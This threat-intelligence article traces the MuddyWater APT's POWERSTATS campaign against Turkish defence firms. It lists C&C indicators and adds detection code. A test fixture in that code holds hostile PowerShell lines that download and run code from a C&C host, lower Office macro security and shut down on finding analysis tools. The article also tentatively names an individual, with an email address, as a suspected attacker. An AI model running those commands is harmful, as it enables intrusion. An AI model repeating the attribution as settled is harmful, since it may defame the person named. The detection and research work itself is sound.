Muddy Water: how hackers from MuddyWater attacked a Turkish electronics manufacturer


Iranian state-sponsored hackers are having a hard time. All spring, unknown parties have been publishing "secret leaks" on Telegram: information about APT groups linked to the Iranian government, OilRig and MuddyWater, their tools, victims and connections. But not about everyone. In April, Group-IB specialists discovered a leak of email addresses belonging to the Turkish company ASELSAN A.Ş, which produces tactical military radios and electronic defence systems for the Turkish armed forces. Anastasia Tikhonova, Head of Advanced Threat Research at Group-IB, and Nikita Rostovtsev, junior analyst at Group-IB, describe the course of the attack on ASELSAN A.Ş and a possible member of MuddyWater.

Leaks via Telegram

The exposure of Iranian APT groups began when a certain Lab Dookhtegan made public the source code of six APT34 (aka OilRig and HelixKitten) tools, disclosed the IP addresses and domains used in its operations, and published data on 66 victims of the hackers, including Etihad Airways and Emirates National Oil. Lab Dookhtegan also leaked data about the group's past operations and information about employees of the Iranian Ministry of Intelligence and Security allegedly linked to the group's activity. OilRig is an Iran-linked APT group that has existed since about 2014 and targets government, financial and military organisations, as well as energy and telecom companies, in the Middle East and China.

After OilRig was exposed, the leaks continued: information about the activities of another pro-government group from Iran, MuddyWater, appeared on the darknet and on Telegram. However, unlike the first case, this time it was not source code that was published but dumps, including screenshots of victims' desktops, control servers, and IP addresses of past victims. This time a group of hackers calling themselves Green Leakers claimed responsibility for the MuddyWater leaks. They run several Telegram channels and darknet sites where they advertise and sell data related to MuddyWater's operations.

Cyber spies from the Middle East

MuddyWater is a group that has been active in the Middle East since 2017. For example, as Group-IB experts observed, from February to April 2019 the hackers carried out a series of phishing mailings targeting government, educational, financial, telecom and defence organisations in Turkey, Iran, Afghanistan, Iraq and Azerbaijan.

Group members use a backdoor of their own development, written in PowerShell, called POWERSTATS. It can:

  • collect information about local and domain accounts, available file servers, internal and external IP addresses, and the OS name and architecture;
  • execute commands remotely;
  • upload and download files via the C&C;
  • detect the presence of debugging tools used in malware analysis;
  • shut down the system if malware analysis tools are found;
  • delete files from local drives;
  • take screenshots;
  • disable security measures in Microsoft Office products.
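The capability list above is what a defender would hunt for in PowerShell script-block logging (Event ID 4104). The following is an added example, not code from the Group-IB report or from the POWERSTATS backdoor: it scores each script block against one assumed regular expression per listed capability and flags blocks that exhibit several of them at once. The patterns (for instance, treating a write to the Office VBAWarnings registry value as "disabling Office security", or a Get-Process call followed by debugger names as the analysis-tool check) and the sample events are the editor's assumptions and constructed data, not indicators published by Group-IB.

```python
"""Score PowerShell script-block log entries against the POWERSTATS capability list.

Added example, not code from the Group-IB report or from the backdoor itself.
Every pattern below is an assumed heuristic for one listed capability, and the
events are constructed for the example.
"""
import re

# One assumed PowerShell pattern per capability listed in the article. These are
# the editor's heuristics, not indicators published by Group-IB.
CAPABILITY_PATTERNS = {
    "account_enum": re.compile(r"net\s+(?:user|group)\b|Win32_UserAccount|Get-ADUser", re.I),
    "host_fingerprint": re.compile(r"Win32_OperatingSystem|Win32_ComputerSystem|PROCESSOR_ARCHITECTURE", re.I),
    "external_ip": re.compile(r"ipify\.org|ipinfo\.io|icanhazip\.com", re.I),
    "remote_exec": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "file_transfer": re.compile(r"Net\.WebClient|Invoke-WebRequest|DownloadFile|UploadFile", re.I),
    # process listing followed by names of analysis tools (assumed tool names)
    "analysis_tool_check": re.compile(
        r"Get-Process\b.*?\b(?:wireshark|procmon|procexp|ollydbg|x64dbg|x32dbg|idaq?|fiddler|autoruns)\b",
        re.I | re.S),
    "shutdown": re.compile(r"Stop-Computer|shutdown(?:\.exe)?\s+/s", re.I),
    "file_deletion": re.compile(r"Remove-Item\b.*?-Force|\bdel\s+/f", re.I),
    "screenshot": re.compile(r"CopyFromScreen|System\.Drawing\.Bitmap", re.I),
    "office_security_disable": re.compile(r"VBAWarnings|AccessVBOM|DisableInternetFilesInPV|\\Security\\Trusted", re.I),
}


def score_script_block(text):
    """Return the set of listed capabilities whose pattern appears in one script block."""
    return {name for name, pattern in CAPABILITY_PATTERNS.items() if pattern.search(text)}


def triage(events, threshold=4):
    """Return (script_block_id, sorted capabilities) for 4104 events at or above threshold."""
    hits = []
    for event in events:
        if event.get("event_id") != 4104:
            continue
        caps = score_script_block(event["text"])
        if len(caps) >= threshold:
            hits.append((event["script_block_id"], sorted(caps)))
    return hits


# Constructed Event ID 4104 entries: one benign admin script, one block shaped
# like the capability list, and one unrelated event that is ignored.
SAMPLE_EVENTS = [
    {"event_id": 4104, "script_block_id": "sb-1", "host": "WS-07", "text": "\n".join([
        "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5",
        "Remove-Item \"$env:TEMP\\*.log\" -Force",
        "Invoke-WebRequest -Uri https://example.org/report.csv -OutFile report.csv",
    ])},
    {"event_id": 4104, "script_block_id": "sb-2", "host": "WS-07", "text": "\n".join([
        "$os = Get-WmiObject Win32_OperatingSystem; $arch = $env:PROCESSOR_ARCHITECTURE",
        "$users = Get-WmiObject Win32_UserAccount | Select-Object Name",
        "$ext = (New-Object Net.WebClient).DownloadString('https://api.ipify.org')",
        "$names = (Get-Process).Name",
        "if ($names -match 'wireshark|procmon|ollydbg') { Stop-Computer -Force }",
        "Set-ItemProperty 'HKCU:\\Software\\Microsoft\\Office\\16.0\\Word\\Security' -Name VBAWarnings -Value 1",
        "IEX (New-Object Net.WebClient).DownloadString('http://' + $c2 + '/u')",
    ])},
    {"event_id": 4103, "script_block_id": "sb-3", "host": "WS-09", "text": "Write-Host hello"},
]

if __name__ == "__main__":
    for block_id, caps in triage(SAMPLE_EVENTS):
        print(block_id, caps)
```

The threshold of four keeps ordinary administration scripts (which routinely delete files and fetch URLs, as sb-1 does) below the line; the number of capabilities that co-occur in one block is the signal, not any single pattern.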

At one point the attackers made a mistake, and researchers from ReaQta managed to obtain the attackers' real IP address, which was located in Tehran. Given the group's targets and its cyber-espionage objectives, experts suggested that the group represents the interests of the Iranian government.

Indicators of compromise

C&C:

  • gladiator[.]tk
  • 94.23.148[.]194
  • 192.95.21[.]28
  • 46.105.84[.]146
  • 185.162.235[.]182

Files:

  • 09aabd2613d339d90ddbd4b7c09195a9
  • cfa845995b851aacdf40b8e6a5b87ba7
  • a61b268e9bc9b7e6c9125cdbfb1c422a
  • f12bab5541a7d8ef4bbca81f6fc835a3
  • a066f5b93f4ac85e9adfe5ff3b10bc28
  • 8a004e93d7ee3b26d94156768bc0839d
  • 0638adf8fb4095d60fbef190a759aa9e
  • eed599981c097944fa143e7d7f7e17b1
  • 21aebece73549b3c4355a6060df410e9
  • 5c6148619abb10bb3789dcfb32f759a6
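To put the indicators above to use, here is an added example (not part of the original article) that refangs the defanged C&C entries, splits them into domain and IP sets, and scans log lines for them together with the published MD5 hashes. The log lines are constructed for the example; the word-boundary lookarounds stop 94.23.148[.]194 from matching 94.23.148.19, and subdomains of gladiator[.]tk are matched as well.

```python
"""Match the published MuddyWater indicators against log lines.

Added example, not part of the original article. The indicators are copied
from the list above; the log lines are constructed.
"""
import re

# Indicators exactly as published above (defanged form kept verbatim).
C2_INDICATORS = [
    "gladiator[.]tk",
    "94.23.148[.]194",
    "192.95.21[.]28",
    "46.105.84[.]146",
    "185.162.235[.]182",
]
FILE_MD5 = [
    "09aabd2613d339d90ddbd4b7c09195a9", "cfa845995b851aacdf40b8e6a5b87ba7",
    "a61b268e9bc9b7e6c9125cdbfb1c422a", "f12bab5541a7d8ef4bbca81f6fc835a3",
    "a066f5b93f4ac85e9adfe5ff3b10bc28", "8a004e93d7ee3b26d94156768bc0839d",
    "0638adf8fb4095d60fbef190a759aa9e", "eed599981c097944fa143e7d7f7e17b1",
    "21aebece73549b3c4355a6060df410e9", "5c6148619abb10bb3789dcfb32f759a6",
]

# Lookarounds ensure a match is a whole token, not a prefix of a longer IP/hash.
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
HOST_RE = re.compile(r"(?<![\w.-])(?:[a-z0-9-]+\.)+[a-z]{2,}(?![\w-])", re.I)
MD5_RE = re.compile(r"(?<![0-9a-f])[0-9a-f]{32}(?![0-9a-f])", re.I)


def refang(ioc):
    """Turn the publication-safe form back into a matchable value."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


def build_ioc_sets():
    """Split the C&C list into IP and domain sets; hashes are lower-cased."""
    ips, domains = set(), set()
    for ioc in C2_INDICATORS:
        value = refang(ioc).lower()
        (ips if IPV4_RE.fullmatch(value) else domains).add(value)
    return {"ip": ips, "domain": domains, "md5": {h.lower() for h in FILE_MD5}}


def scan_lines(lines, iocs=None):
    """Return (line_number, indicator_type, value) for every indicator seen in the lines."""
    iocs = iocs or build_ioc_sets()
    hits = []
    for number, line in enumerate(lines, 1):
        for ip in IPV4_RE.findall(line):
            if ip in iocs["ip"]:
                hits.append((number, "ip", ip))
        for host in HOST_RE.findall(line):
            host = host.lower()
            if host in iocs["domain"] or any(host.endswith("." + d) for d in iocs["domain"]):
                hits.append((number, "domain", host))
        for digest in MD5_RE.findall(line):
            if digest.lower() in iocs["md5"]:
                hits.append((number, "md5", digest.lower()))
    return hits


# Constructed DNS, proxy and EDR lines; line 3 is a deliberate near miss.
SAMPLE_LOGS = [
    "2019-03-14T09:12:01Z dns client=10.0.0.15 query=A name=gladiator.tk",
    "2019-03-14T09:12:02Z proxy client=10.0.0.15 method=CONNECT dest=94.23.148.194:443 status=200",
    "2019-03-14T09:13:40Z proxy client=10.0.0.22 method=GET dest=94.23.148.19:80 status=200",
    "2019-03-14T09:15:07Z edr host=WS-07 event=file_create path=C:\\Users\\u\\Downloads\\asd.doc md5=21AEBECE73549B3C4355A6060DF410E9",
    "2019-03-14T09:16:00Z dns client=10.0.0.15 query=A name=update.gladiator.tk",
    "2019-03-14T09:20:11Z dns client=10.0.0.31 query=A name=www.example.com",
]

if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOGS):
        print(hit)
```

Hash matching is case-insensitive because EDR and sandbox exports disagree on MD5 casing; the near-miss line shows why plain substring search on IP addresses is not good enough.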

Turkey under attack

On 10 April 2019, Group-IB specialists discovered a leak of email addresses belonging to the Turkish company ASELSAN A.Ş, the largest electronics manufacturer in Turkey. Its products include radar and electronic warfare systems, electro-optics, avionics, unmanned systems, and land, naval, weapon and air defence systems.

Analysing one of the latest POWERSTATS malware samples, Group-IB experts determined that the MuddyWater attackers used as a decoy a licence agreement between Koç Savunma, a company providing information and defence technology solutions, and Tubitak Bilgem, a research centre for information security and advanced technologies. The contact person on the Koç Savunma side was Tahir Taner Tımış, who held the position of Programs Manager at Koç Bilgi ve Savunma Teknolojileri A.Ş. from September 2013 to December 2018 and later joined ASELSAN A.Ş.

Screenshot: sample of the decoy document.
After the user enables the malicious macros, the POWERSTATS backdoor is downloaded to the victim's computer.

Thanks to the metadata of this decoy document (MD5: 0638adf8fb4095d60fbef190a759aa9e), the researchers were able to find three more samples containing identical values, including the creation date and time, the user name and the list of embedded macros:

  • ListOfHackedEmails.doc (eed599981c097944fa143e7d7f7e17b1)
  • asd.doc (21aebece73549b3c4355a6060df410e9)
  • F35-Specifications.doc (5c6148619abb10bb3789dcfb32f759a6)
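The pivot described above (grouping documents by identical creation time, author and VBA module list) is straightforward to automate. The following is an added example, not Group-IB's tooling: it normalises those fields into a key, clusters metadata records by it, and returns the samples related to the seed decoy. The metadata values (author name, timestamp, module names) and the unrelated fifth record are constructed placeholders, since the article only states that the four documents share those fields; metadata_from_ole shows how the same fields would be read from a real .doc with the olefile and oletools libraries, but the sample run uses the embedded records so it works offline.

```python
"""Cluster malicious Office documents by shared authoring metadata.

Added example, not Group-IB's tooling. The metadata values below are constructed
placeholders: the article states only that the four documents share creation
time, user name and macro list, not what those values are.
"""
from collections import defaultdict

# Constructed records. The first four MD5s are the samples named in the article;
# the fifth is a placeholder for an unrelated document with different metadata.
# One author is upper-cased and one macro list reordered to exercise normalisation.
SAMPLE_METADATA = [
    {"md5": "0638adf8fb4095d60fbef190a759aa9e", "filename": "decoy.doc",
     "author": "user01", "created": "2019-04-08T07:41:00", "macros": ["ThisDocument", "Module1"]},
    {"md5": "eed599981c097944fa143e7d7f7e17b1", "filename": "ListOfHackedEmails.doc",
     "author": "user01", "created": "2019-04-08T07:41:00", "macros": ["Module1", "ThisDocument"]},
    {"md5": "21aebece73549b3c4355a6060df410e9", "filename": "asd.doc",
     "author": "user01", "created": "2019-04-08T07:41:00", "macros": ["ThisDocument", "Module1"]},
    {"md5": "5c6148619abb10bb3789dcfb32f759a6", "filename": "F35-Specifications.doc",
     "author": "USER01", "created": "2019-04-08T07:41:00", "macros": ["ThisDocument", "Module1"]},
    {"md5": "11111111111111111111111111111111", "filename": "unrelated.doc",
     "author": "user02", "created": "2019-02-01T10:00:00", "macros": ["ThisDocument"]},
]


def pivot_key(record):
    """Normalised pivot: creation timestamp, case-folded author, sorted VBA module names."""
    return (record["created"], record["author"].casefold(), tuple(sorted(record["macros"])))


def cluster_by_metadata(records):
    """Group sample hashes whose pivot key is identical; singletons are dropped."""
    groups = defaultdict(list)
    for record in records:
        groups[pivot_key(record)].append(record["md5"])
    return {key: sorted(md5s) for key, md5s in groups.items() if len(md5s) > 1}


def related_samples(seed_md5, records):
    """Hashes sharing the seed document's pivot key, excluding the seed itself."""
    seed = next(r for r in records if r["md5"] == seed_md5)
    key = pivot_key(seed)
    return sorted(r["md5"] for r in records if r["md5"] != seed_md5 and pivot_key(r) == key)


def metadata_from_ole(path):
    """Read the same fields from a real OLE .doc.

    Requires the olefile and oletools packages (imported lazily; not used by the
    sample run). SummaryInformation gives author and creation time, olevba gives
    the VBA module names.
    """
    import hashlib
    import olefile
    from oletools.olevba import VBA_Parser

    ole = olefile.OleFileIO(path)
    meta = ole.get_metadata()
    ole.close()
    parser = VBA_Parser(path)
    modules = []
    if parser.detect_vba_macros():
        modules = [vba_filename for _, _, vba_filename, _ in parser.extract_macros()]
    parser.close()
    with open(path, "rb") as handle:
        digest = hashlib.md5(handle.read()).hexdigest()
    return {
        "md5": digest,
        "filename": path,
        "author": (meta.author or b"").decode("latin-1", "replace"),
        "created": meta.create_time.isoformat() if meta.create_time else "",
        "macros": modules,
    }


if __name__ == "__main__":
    for key, md5s in cluster_by_metadata(SAMPLE_METADATA).items():
        print(key, md5s)
    print(related_samples("0638adf8fb4095d60fbef190a759aa9e", SAMPLE_METADATA))
```

Case-folding the author and sorting the module list matters in practice: the same template saved from a different Office build can reorder modules, and the user name is free text, so a raw tuple comparison would split one cluster into several.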

Screenshot: identical metadata in different decoy documents.

One of the discovered documents, ListOfHackedEmails.doc, contains a list of 34 email addresses in the @aselsan.com.tr domain.

Group-IB specialists checked the email addresses against publicly available breach data and found that 28 of them had been compromised in previously discovered leaks. A check of the available leak compilations showed about 400 unique logins associated with this domain, together with passwords for them. The attackers may well have used this publicly available data to attack ASELSAN A.Ş.

Screenshot: the ListOfHackedEmails.doc document.

Screenshot: list of more than 450 login/password pairs found in public leaks.

Among the samples found there is also a document titled F35-Specifications.doc, referring to the F-35 fighter. The decoy document is a specification of the F-35 multirole fighter-bomber, showing the aircraft's characteristics and price. The topic of this decoy is directly related to the US refusal to supply F-35s after Turkey purchased the S-400 system, and to the threat of F-35 Lightning II data being handed over to Russia.

All the collected data indicate that the main targets of MuddyWater's cyberattacks are organisations located in Turkey.

Who are Gladiyator_CRK and Nima Nikjoo?

Earlier, in March 2019, a Windows user under the name Gladiyator_CRK created several malicious documents. These documents also distributed the POWERSTATS backdoor and connected to a C&C server with the same name, gladiator[.]tk.

This was probably done after the user Nima Nikjoo posted on Twitter on 14 March 2019, attempting to deobfuscate code linked to MuddyWater. In the comments on that tweet, the researcher said he could not share indicators of compromise for this malware because that information was confidential. Unfortunately, the post has already been deleted, but traces of it remain online:

Nima Nikjoo is the owner of the Gladiyator_CRK profile on the Iranian video-hosting sites dideo.ir and videoi.ir. On that site he demonstrates PoC utilities for disabling antivirus tools from various vendors and bypassing sandboxes. Nima Nikjoo writes about himself that he is a network security specialist, as well as a reverse engineer and malware analyst working for MTN Irancell, an Iranian telecom company.

Screenshot of the videos cached in Google search results:

Later, on 19 March 2019, the Twitter user Nima Nikjoo changed his name to Malware Fighter and deleted related posts and comments. The Gladiyator_CRK profile on the video hosting site dideo.ir was also deleted, as was the one on YouTube, and the profile itself was renamed N Tabrizi. However, about a month later (16 April 2019), the Twitter account went back to using the name Nima Nikjoo.

During the investigation, Group-IB specialists found that Nima Nikjoo had already been mentioned in connection with Iranian cybercriminal activity. In August 2014, the Iranian blog Khabarestan published information about individuals linked to the cybercriminal group Iranian Nasr Institute. A FireEye investigation indicated that the Nasr Institute was a contractor for APT33 and was involved in DDoS attacks on US banks between 2011 and 2013 as part of a campaign called Operation Ababil.

That blog mentions a Nima Nikju-Nikjoo, who develops malware for spying on Iranians, along with his email address: gladiator_cracker@yahoo[.]com.

Screenshot of the data attributed to cybercriminals from the Iranian Nasr Institute:

Translation of the highlighted text: Nima Nikio, spyware developer, Email: .

As can be seen from this data, the email address correlates with the address used in the attack and with the users Gladiyator_CRK and Nima Nikjoo.

In addition, an article dated 15 June 2017 states that Nikjoo was somewhat careless in leaving references to the Kavosh Security Center in his developments. There is an opinion that the Kavosh Security Center is backed by the Iranian government in order to support state-sponsored hackers.

Information about the company Nima Nikjoo worked for:

The LinkedIn profile of the Twitter user Nima Nikjoo lists his first place of work as the Kavosh Security Center, where he worked from 2006 to 2014. During that time he studied various malware and dealt with reverse engineering and obfuscation-related tasks.

Information on LinkedIn about the company Nima Nikjoo worked for:


MuddyWater and pride

Interestingly, the MuddyWater group keeps track of all reports and posts that security experts publish about them, and at first even deliberately planted false flags to throw researchers off the scent. For example, their first attack misled experts through the use of DNS Messenger, which is usually associated with the FIN7 group. In other attacks they inserted Chinese strings into the code.

In addition, the group likes to leave messages for researchers. For example, they did not like that Kaspersky Lab placed MuddyWater 3rd in its annual threat rating. At the same time, someone, presumably the MuddyWater group, uploaded to YouTube a PoC exploit that disables Kaspersky Lab's antivirus. They also left a comment under the article.

Screenshot: video on disabling Kaspersky Lab's antivirus, and the comment below it:

It is still difficult to draw an unambiguous conclusion about the involvement of "Nima Nikjoo". Group-IB experts consider two versions. Nima Nikjoo may indeed be a hacker from the MuddyWater group, exposed through his carelessness and his increased activity online. The second option is that other members of the group deliberately "exposed" him to divert suspicion from themselves. In any case, Group-IB is continuing its investigation and will report its findings.

As for the Iranian APTs, after this series of leaks they will probably face a serious "rebranding": the hackers will be forced to substantially change their toolset, clean up their tracks and possibly hunt for "moles" in their ranks. Experts did not rule out that they would even take a break, but after a short pause, Iranian APT attacks resumed.

source: www.habr.com
